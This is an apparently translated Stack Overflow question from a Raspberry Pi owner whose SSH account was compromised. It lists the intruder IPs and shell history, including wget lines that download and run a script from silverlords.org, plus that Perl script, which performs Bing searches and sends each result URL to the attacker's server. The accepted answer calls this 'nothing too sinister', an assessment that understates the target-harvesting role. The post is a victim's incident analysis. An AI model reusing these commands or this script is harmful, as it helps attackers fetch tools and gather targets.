linux - 在保护我的网络服务器(rpi)免受外部 ssh 登录的影响后，我在我的计算机上发现了这个 perl 脚本。有人能告诉我它有什么作用吗？-6ren

linux - 在保护我的网络服务器(rpi)免受外部 ssh 登录的影响后，我在我的计算机上发现了这个 perl 脚本。有人能告诉我它有什么作用吗？

转载作者：太空宇宙更新时间：2023-11-04 04:37:41

25

4

有一个名为“user”的帐户将用于这些登录，该帐户来自世界各地。昨天我花了几个小时保护计算机，从那时起就没有登录过。我awk将/var/log/auth.log 编辑到按从最旧到最近登录顺序排列的 ip 列表中，如果这有帮助的话:

    185.145.252.26
    185.145.252.36
    109.236.83.3
    104.167.2.4
    217.23.13.125
    185.38.148.238
    194.88.106.146
    43.225.107.70
    194.88.107.163
    192.162.101.217
    62.112.11.88
    194.63.141.141
    194.88.107.162
    74.222.19.247
    194.88.107.164
    178.137.184.237
    167.114.210.108
    5.196.76.41
    118.70.72.25
    109.236.91.85
    62.112.11.222
    91.195.103.172
    62.112.11.94
    62.112.11.90
    188.27.75.73
    194.88.106.197
    194.88.107.165
    38.84.132.236
    91.197.235.11
    62.112.11.79
    62.112.11.223
    144.76.112.21
    185.8.7.144
    91.230.47.91
    91.230.47.92
    91.195.103.189
    91.230.47.89
    91.230.47.90
    109.236.89.72
    195.228.11.82
    109.236.92.184
    46.175.121.38
    94.177.190.188
    171.251.76.179
    173.212.230.79
    144.217.75.30
    5.141.202.235
    31.207.47.36
    62.112.11.86
    217.23.2.183
    217.23.1.87
    154.122.98.44
    41.47.42.128
    41.242.137.33
    171.232.175.131
    41.114.123.190
    1.54.115.72
    108.170.8.185
    86.121.85.122
    91.197.232.103
    160.0.224.69
    217.23.2.77
    212.83.171.102
    41.145.17.243
    62.112.11.81
    82.79.252.36
    41.114.63.134
    5.56.133.126
    109.120.131.106
    76.68.108.151
    113.20.108.27
    46.246.61.20
    146.185.28.52
    45.32.219.199

更改“用户”帐户的密码后我做的第一件事就是运行 history ，这给了我这个结果:

1  sudo
2  sudo
3  sudo service vsftpd stop
4  su clay
5  unset PROMPT_COMMAND
6  PS1='[PEXPECT]\$'
7  wget http://xpl.silverlords.org/bing -O bing
8  wget http://www.silverlords.org/wordlist/xaaaaaaaaqb.txt -O word ; perl bing word
9  wget http://www.silverlords.org/wordlist/xaaaaaaaaiv.txt -O word ; perl bing word
10  uname
11  n
12  uname
13  history

然后我跑了 cat /home/user/.bash_history了解更多，但我已经拥有的就是文件中的所有内容。

在“用户”的主文件夹中，我找到了四个文件，bing , output.13.19.27.txt , output.16.10.38.txt ，和word 。除了 bing 之外，所有内容都是空的，这是一个 Perl 脚本:

#!/usr/bin/perl                                                            
use strict;                                                          
use LWP::UserAgent;                                                                 
use LWP::Simple;                                                                    
use POSIX qw(strftime);                                                             
my $data = strftime "%H.%M.%S", gmtime;                                             

my $ARGC = @ARGV;                                                                   
if ($ARGC !=1) {                                                                    
        printf "$0 arquivo.txt\n";                                                  
        printf "Coded by: Al3xG0 x@~\n";                                            
        exit(1);                                                                    
}
my $st = rand();
my $filename = $ARGV[0];
print "Input Filename - $filename\n";

my $max_results = 2;

open (IFH, "< $filename") or die $!;
open (OFH, "> output.${data}.txt") or die $!;

while (<IFH>) {
        next if /^ *$/;
        my $search_word = $_;
        $search_word =~ s/\n//;
        print "Results for -$search_word-\n";
        for (my $i = 0; $i < $max_results; $i += 10) {
                my $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
                $b->timeout(30); $b->env_proxy;
                my $c = $b->get('http://www.bing.com/search?q=' . $search_word . '&first=' . $i . '&FORM=PERE')->content;
                my $check = index($c, 'sb_pagN');
                if ($check == -1) { last; }
                while (1) { 
                        my $n = index($c, '<h2><a href="');
                        if ($n == -1) { last; }
                        $c = substr($c, $n + 13);
                        my $s = substr($c, 0, index($c, '"'));
                        my $save = undef;
                        if ($s =~ /http:\/\/([^\/]+)\//g) { $save = $s; }
                        print "$save\n";
                        #if ($save !~ /^ *$/) { print OFH "$save\n"; print "$save\n"};
                        getprint("http://post.silverlords.org/sites.php?site=$save");
                }
        }
        print "\n";
}
close (IFH);
close (OFH);

我不懂perl，而且花了这么多时间在sshd配置、黑名单等方面，我真的没有时间或精力去学习。如果有人能告诉我该脚本的作用和/或攻击者试图做什么，那就太好了。

非常感谢，
粘土

编辑:我发现这篇文章可以解释 bing 搜索脚本的用途:https://www.wired.com/2013/02/microsoft-bing-fights-botnets/

最佳答案

它读取通过命令行传递的文件，并使用每一行作为一个短语来进行 Bing 搜索。它打印 Bing 返回的每个搜索结果的 URL，并将其发送到 http://post.silverlords.org/sites.php?site=$save，其中 $save 是 URL

它曾经将相同的 URL 写入 output.HH.MM.SS.txt 文件，但该行已被注释掉，因此文件已创建但保留为空

所以这只是一个命令行 bing 搜索；没什么太险恶的。基本上没有什么是他们不能在任何可以访问 bing

的机器上运行的

关于linux - 在保护我的网络服务器(rpi)免受外部 ssh 登录的影响后，我在我的计算机上发现了这个 perl 脚本。有人能告诉我它有什么作用吗？，我们在Stack Overflow上找到一个类似的问题： https://stackoverflow.com/questions/44346821/

25

4

0

文章推荐： linux - bash中的-z是什么

文章推荐： algorithm - cuda矩阵逆高斯乔丹

文章推荐： Javascript 鼠标悬停事件 Acting Squirrely

文章推荐： c - 定义 NOOP 宏而不会出现未使用的变量错误

Git:在不提交的情况下切换工作区(计算机)
有没有办法在不进行提交/ check out 的情况下应用差异补丁或类似补丁？我的情况:我工作时经常在计算机之间切换，我的提交历史记录有一堆“switching machines”消息。我最初的猜
assembly - 引导加载程序代码有时会崩溃(三重故障？)计算机
我的自定义引导加载程序中有代码从地址 0x8E00 处的 512 字节缓冲区复制内存。进入高内存，0x100000和更高。这在某些计算机上运行良好，而在其他计算机上崩溃(我假设是三重故障)。此代码在
networking - 是否可以在没有操作系统集成的情况下将数据从服务器推送到客户端(电话、计算机)
服务器有没有办法将一些数据无线无缝地推送到客户端，可能是 Windows(电话)、iPhone、Mac 或 Android 设备，没有任何操作系统集成？如果是这样，最好的设计模式是什么，最好的技术是
hadoop - Hadoop与 super 计算机
我无法理解hadoop的真正本质。如果我有足够的资源来购买可以处理PB级数据的 super 计算机，那么为什么我需要Hadoop基础架构来管理如此大的数据？最佳答案 hadoop的全部目的是能够在
grails - Grails-计算机/浏览器的语言环境不会影响i18n机制
我有一个奇怪的问题，或者我可能无法理解Grails i18n机制的工作原理。我将以下内容插入到index.gsp文件中: LocaleContextHolder.locale:
c# 在启动时锁定 Windows 计算机
我正在尝试为我的小弟弟编写一个简单的程序。他经常在他的电脑后面，但他应该为学校学习简单的算术 :D 我想制作以下程序: 他启动了他的电脑他需要做一些简单的练习并完成如果他做对了 x 次，他可以继续
mysql - 不同主机(计算机)上MySQL数据库的简单数据库备份
有人能告诉我如何在 diff 主机(计算机)上为 MySQL 数据库做一个简单的数据库备份吗？我正在尝试将我的数据库从一台主机(服务器)移动到一台新主机(服务器) 最佳答案如果您只是需要在服务器之间
javascript - 最适合(计算机)网络图的布局
关闭。这个问题不符合Stack Overflow guidelines .它目前不接受答案。要求我们推荐或查找工具、库或最喜欢的场外资源的问题对于 Stack Overflow 来说是无关紧要的，因
android - USBDevice 无法识别 Linux 计算机
我正在尝试让 Android 应用程序使用 USB 电缆与运行 ubuntu 12.04 lts 的 Linux 计算机进行通信。我正在尝试使用 usbdeviceconnection 类，但是当我通
windows - 计算机 sleep 后无法访问 Docker
我刚刚使用 docker-toolbox 1.8.2 安装了 docker在 Windows 10 上。由于由于this issue我不得不使用这些命令重新创建 docker 镜像 docker-m
virtualization - 如何删除处于 GURU_MEDITATION 错误状态的 virtualbox 计算机？
如何删除处于 GURU_MEDITATION 错误状态的 VirtualBox 计算机？在 VirtualBox 未运行时删除该目录是否足够？编辑:发布后，我删除了“在文件管理器中显示”导航到的整个
azure - Azure 计算机 ACI Web 服务部署在哪里？
当我们在 Azure 机器学习服务中将模型部署为 ACIWebService 时，不需要指定任何 deployment_target。根据AzureML documentation对于 azurem
azure - Azure 计算机 ACI Web 服务部署在哪里？
当我们在 Azure 机器学习服务中将模型部署为 ACIWebService 时，不需要指定任何 deployment_target。根据AzureML documentation对于 azurem
python - Blackjack 风格的 Python(计算机)游戏循环不正确
我遇到的主要问题是当我选择 stay 时会发生什么上hand_one ，然后 hit上hand_two . 而不是让我hit or stay上hand_two再次，它让我回到hit or stay上h
linux - 协助通过 Powershell 脚本或其他脚本更新一组 Linux 计算机
我知道我可以使用 putty 来 ssh 进入每台 Linux 机器并更新 CentOS 服务器...但我希望有人能够为我指明正确的方向，告诉我如何通过 PowerShell 或 Windows 中的
algorithm - Donald Knuth 的 MIX 计算机
在 MIX 计算机中，一个单词由五个字节和一个符号组成。符号在内存中是如何表示的？是另一个字节，所以每个字真的是六个字节吗？谢谢。最佳答案你的问题不是很清楚。体系结构规范未指定实际实现。它仅指定
python - 计算机(Windows XP)不想打开 .py
我是 Python 的初级程序员，我的电脑有一个奇怪的问题。当我的计算机上有一个 .py 文件(包含一个有效的脚本)并双击它打开时，会发生以下情况:程序打开(它是黑屏 View )，但它会在一秒钟内自
mysql - 将 mysqldump 自动化到本地 Windows 计算机
我正在尝试在 Windows 上使用 plink 创建到 Linux 机器的隧道，并让转储文件最终出现在 Windows 机器上。看起来 this answer会工作，是我的问题的基础。但是尝试一下并
windows - 使用脚本将 Jenkins 节点暂时离线并重启 Windows 计算机
我想在 Windows 7 和 10 计算机上执行重启，但我首先需要将 Jenkins 节点暂时离线。在执行重启之前，我需要完成所有正在运行的任务。然后我远程登录到服务器并重新启动计算机。然而，在我重
java - 在 Java 中按名称 Ping 计算机
我正在编写一个简单的程序，从 MySQL 数据库中提取计算机名称，然后将这些名称存储到字符串数组列表中(这部分工作正常)。之后，我编写了一个类和一个方法，将字符串作为参数(这将是计算机名称)并尝试对其

首页

博学

6Ren·AI

商城

linux - 在保护我的网络服务器(rpi)免受外部 ssh 登录的影响后，我在我的计算机上发现了这个 perl 脚本。有人能告诉我它有什么作用吗？